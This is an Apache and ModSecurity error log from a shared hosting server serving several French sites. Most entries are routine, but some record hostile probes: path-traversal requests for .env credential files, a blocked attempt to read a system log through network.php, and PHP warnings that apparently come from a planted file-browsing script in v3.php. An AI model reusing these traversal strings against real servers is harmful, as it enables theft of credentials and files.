[Tue May 12 03:19:11.775970 2026] [security2:error] [pid 1691274:tid 1691283] [client 162.62.213.165:60390] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKAD1fdQaraX_prmqcnQQAAAAY"]
[Tue May 12 03:19:13.383132 2026] [security2:error] [pid 1709071:tid 1709101] [client 43.166.128.86:54702] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.portail.tct-telecom.fr"] [uri "/"] [unique_id "agKAEbvMumyrWMfSu7qxKAAAAM4"]
[Tue May 12 03:19:16.045172 2026] [security2:error] [pid 1730175:tid 1730182] [client 43.128.87.4:57220] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agKAFHo6NvB9WXx5V-6BagAAAQU"], referer: http://maelbailly.fr
[Tue May 12 03:19:19.406830 2026] [security2:error] [pid 1691274:tid 1691294] [client 216.73.216.110:18276] ModSecurity: Warning. Matched phrase "var/log/exim_paniclog" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/exim_paniclog found within ARGS:filesrc: /var/log/exim_paniclog"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKAF1fdQaraX_prmqcnTgAAABI"]
[Tue May 12 03:19:19.407514 2026] [security2:error] [pid 1691274:tid 1691294] [client 216.73.216.110:18276] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKAF1fdQaraX_prmqcnTgAAABI"]
[Tue May 12 03:19:19.502878 2026] [security2:error] [pid 1691274:tid 1691294] [client 216.73.216.110:18276] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKAF1fdQaraX_prmqcnTgAAABI"]
[Tue May 12 03:19:22.560193 2026] [autoindex:error] [pid 1709071:tid 1709111] [client 207.90.244.23:53826] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/80/task/80/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/80/task/80/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/80/task/80/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/80/task/80/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/80/task/80/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/80/task/80/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:19:33.129900 2026] [:error] [pid 1695975:tid 1695987] [client 207.90.244.23:52516] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 03:19:34.265673 2026] [:error] [pid 1730207:tid 1730226] [client 207.90.244.23:52526] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 03:19:34.978580 2026] [:error] [pid 1709071:tid 1709092] [client 207.90.244.23:52536] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 03:19:35.871423 2026] [:error] [pid 1730175:tid 1730189] [client 207.90.244.23:52552] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 03:19:43.880996 2026] [:error] [pid 1707624:tid 1707691] [client 207.90.244.23:43140] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 03:19:47.140982 2026] [:error] [pid 1730207:tid 1730228] [client 207.90.244.23:43154] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 03:19:48.233954 2026] [security2:error] [pid 1709071:tid 1709106] [client 43.165.198.5:49434] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/louer-mobil-home/"] [unique_id "agKANLvMumyrWMfSu7qxSAAAANM"]
[Tue May 12 03:19:51.870003 2026] [:error] [pid 1730175:tid 1730188] [client 207.90.244.23:60518] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 03:20:21.608376 2026] [authz_core:error] [pid 1709071:tid 1709110] [client 185.217.125.16:63905] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-admin/includes/error_log, referer: binance.com
[Tue May 12 03:20:25.149148 2026] [core:error] [pid 1691274:tid 1691289] [client 195.178.110.101:7766] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 03:20:25.361981 2026] [core:error] [pid 1707624:tid 1707694] [client 195.178.110.101:7754] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 03:20:25.369314 2026] [core:error] [pid 1730175:tid 1730192] [client 195.178.110.101:7686] AH10244: invalid URI path (/../.env)
[Tue May 12 03:20:28.050364 2026] [authz_core:error] [pid 1691274:tid 1691292] [client 185.217.125.16:58525] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-admin/includes/error_log, referer: binance.com
[Tue May 12 03:20:47.299757 2026] [ssl:error] [pid 1691274:tid 1691297] (EAI 2)Name or service not known: [client 157.245.9.10:34086] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:20:47.299814 2026] [ssl:error] [pid 1691274:tid 1691297] AH01941: stapling_renew_response: responder error
[Tue May 12 03:20:48.403485 2026] [ssl:error] [pid 1707624:tid 1707702] (EAI 2)Name or service not known: [client 136.227.178.115:41937] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:20:48.403532 2026] [ssl:error] [pid 1707624:tid 1707702] AH01941: stapling_renew_response: responder error
[Tue May 12 03:20:49.648815 2026] [security2:error] [pid 1691274:tid 1691283] [client 49.51.245.241:45736] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agKAcVfdQaraX_prmqcnmAAAAAY"]
[Tue May 12 03:20:49.881220 2026] [ssl:error] [pid 1730207:tid 1730219] (EAI 2)Name or service not known: [client 91.108.208.110:32867] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:20:49.881260 2026] [ssl:error] [pid 1730207:tid 1730219] AH01941: stapling_renew_response: responder error
[Tue May 12 03:20:59.906450 2026] [ssl:error] [pid 1695975:tid 1695983] (EAI 2)Name or service not known: [client 104.207.133.54:53332] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:20:59.906486 2026] [ssl:error] [pid 1695975:tid 1695983] AH01941: stapling_renew_response: responder error
[Tue May 12 03:21:03.096200 2026] [ssl:error] [pid 1730175:tid 1730196] (EAI 2)Name or service not known: [client 212.80.200.217:34583] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:21:03.096245 2026] [ssl:error] [pid 1730175:tid 1730196] AH01941: stapling_renew_response: responder error
[Tue May 12 03:21:11.431982 2026] [ssl:error] [pid 1691274:tid 1691294] (EAI 2)Name or service not known: [client 178.128.150.158:50608] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:21:11.432013 2026] [ssl:error] [pid 1691274:tid 1691294] AH01941: stapling_renew_response: responder error
[Tue May 12 03:21:15.963211 2026] [ssl:error] [pid 1707624:tid 1707702] (EAI 2)Name or service not known: [client 204.217.149.47:44927] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:21:15.963279 2026] [ssl:error] [pid 1707624:tid 1707702] AH01941: stapling_renew_response: responder error
[Tue May 12 03:21:21.418001 2026] [autoindex:error] [pid 1730175:tid 1730195] [client 85.203.21.114:29145] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:21:21.440130 2026] [ssl:error] [pid 1707624:tid 1707694] (EAI 2)Name or service not known: [client 104.131.185.64:37730] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:21:21.440165 2026] [ssl:error] [pid 1707624:tid 1707694] AH01941: stapling_renew_response: responder error
[Tue May 12 03:21:22.321859 2026] [autoindex:error] [pid 1730175:tid 1730200] [client 85.203.21.85:32067] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-content/uploads/
[Tue May 12 03:21:22.635172 2026] [ssl:error] [pid 1730207:tid 1730232] (EAI 2)Name or service not known: [client 62.241.50.228:36085] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:21:22.635198 2026] [ssl:error] [pid 1730207:tid 1730232] AH01941: stapling_renew_response: responder error
[Tue May 12 03:21:23.868940 2026] [ssl:error] [pid 1707624:tid 1707703] (EAI 2)Name or service not known: [client 66.227.12.79:39853] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:21:23.868978 2026] [ssl:error] [pid 1707624:tid 1707703] AH01941: stapling_renew_response: responder error
[Tue May 12 03:21:24.230669 2026] [ssl:error] [pid 1691274:tid 1691283] (EAI 2)Name or service not known: [client 68.249.178.139:33014] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:21:24.230707 2026] [ssl:error] [pid 1691274:tid 1691283] AH01941: stapling_renew_response: responder error
[Tue May 12 03:21:25.960947 2026] [autoindex:error] [pid 1730175:tid 1730195] [client 85.203.21.114:29145] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:21:26.846339 2026] [autoindex:error] [pid 1730175:tid 1730200] [client 85.203.21.85:32067] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/css/
[Tue May 12 03:21:28.202651 2026] [proxy_fcgi:error] [pid 1730175:tid 1730195] [client 85.203.21.114:29145] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:21:52.315911 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:21:53.192260 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/js/
[Tue May 12 03:22:01.304703 2026] [authz_core:error] [pid 1695975:tid 1695981] [client 185.191.171.15:55500] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-includes/error_log
[Tue May 12 03:22:29.031566 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:22:30.011577 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/css/
[Tue May 12 03:22:33.619722 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:22:34.591768 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/css/colors/modern/
[Tue May 12 03:22:35.899827 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/languages/plugins/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:22:36.845133 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/languages/plugins/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-content/languages/plugins/
[Tue May 12 03:22:38.201888 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:22:39.090353 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/
[Tue May 12 03:22:42.822745 2026] [proxy_fcgi:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:22:47.447682 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/theme-compat/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:22:48.324758 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/theme-compat/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/theme-compat/
[Tue May 12 03:22:54.598234 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/dist/components/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:22:55.503774 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/dist/components/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/css/dist/components/
[Tue May 12 03:23:01.243979 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/archives/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:23:02.156667 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/archives/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/archives/
[Tue May 12 03:23:05.791139 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/php-compat/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:23:06.789615 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/php-compat/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/php-compat/
[Tue May 12 03:23:08.197794 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:23:09.190359 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/ID3/
[Tue May 12 03:23:10.524130 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:23:11.513776 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/css/colors/blue/
PHP Warning:  filesize(): stat failed for /proc/1704342/task/1704345/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704342/task/1704345/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704342/task/1704345/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704342/task/1704345/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704342/task/1704345/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704342/task/1704345/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:23:24.302637 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:23:25.191968 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-content/upgrade/
